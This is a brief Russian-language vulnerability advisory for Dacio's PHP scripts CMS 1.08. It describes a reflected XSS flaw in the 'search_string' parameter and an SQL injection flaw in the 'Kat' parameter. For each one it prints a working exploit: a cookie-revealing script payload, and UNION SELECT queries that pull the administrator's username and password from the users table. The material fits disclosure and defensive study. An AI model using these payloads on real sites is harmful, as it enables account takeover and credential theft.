Программа: Dacio’s PHP scripts CMS 1.08

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения и выполнить XSS нападение на целевую систему.

1) Уязвимость существует из-за недостаточной обработки входных данных в
параметре «search_string» сценарием index.php. Атакующий может выполнить
произвольный сценарий в браузере жертвы в контексте безопасности уязвимого
сайта.

Эксплоит:

/index.php?search_string="><script>alert(document.cookie)</script>

2) Уязвимость существует из-за недостаточной обработки входных данных в
параметре «Kat». Удаленный пользователь может с помощью специально
сформированного запроса выполнить произвольные SQL команды в базе данных
приложения.

Эксплоит:

/?Kat=-1/**/union/**/select/**/username/**/from/**/kep_uporabniki/**/where/**/IdUser=1/*
/?Kat=-1/**/union/**/select/**/userpass/**/from/**/kep_uporabniki/**/where/**/IdUser=1/*



Оставить мнение